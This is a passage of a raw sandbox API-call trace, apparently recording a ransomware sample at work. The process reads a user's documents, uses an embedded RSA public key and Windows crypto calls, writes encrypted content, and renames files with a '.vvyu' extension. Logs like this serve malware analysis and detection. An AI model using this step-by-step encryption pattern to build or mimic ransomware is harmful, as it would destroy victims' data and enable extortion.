lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.527] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x18583, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x18583, lpOverlapped=0x0) returned 1 [0196.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.529] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.529] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.530] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.531] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.531] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.531] CloseHandle (hObject=0x568) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.533] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\r FiXNL1vU2.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\r fixnl1vu2.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\r FiXNL1vU2.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\r fixnl1vu2.ots.vvyu")) returned 1 [0196.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.535] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.538] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x123a2b90, ftCreationTime.dwHighDateTime=0x1d8a25d, ftLastAccessTime.dwLowDateTime=0x79c5c30, ftLastAccessTime.dwHighDateTime=0x1d8a2f3, ftLastWriteTime.dwLowDateTime=0x79c5c30, ftLastWriteTime.dwHighDateTime=0x1d8a2f3, nFileSizeHigh=0x0, nFileSizeLow=0x12685, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U-GFPMIYoqWy2p9O.xlsx", cAlternateFileName="U-GFPM~1.XLS")) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.538] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\U-GFPMIYoqWy2p9O.xlsx") returned=".xlsx" [0196.538] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\U-GFPMIYoqWy2p9O.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\u-gfpmiyoqwy2p9o.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.539] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=75397) returned 1 [0196.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.542] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1265f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.542] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.544] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.544] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12685, lpOverlapped=0x0) returned 1 [0196.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.546] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.547] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.547] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.547] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.547] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.547] GetLastError () returned 0x0 [0196.547] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.547] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.547] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.547] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.547] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12690) returned 0x2ea79b0 [0196.548] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1890 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea18d8 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.549] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2eb8 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0196.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.553] GetCurrentThreadId () returned 0x66c [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea54a0 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.553] GetCurrentThreadId () returned 0x66c [0196.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 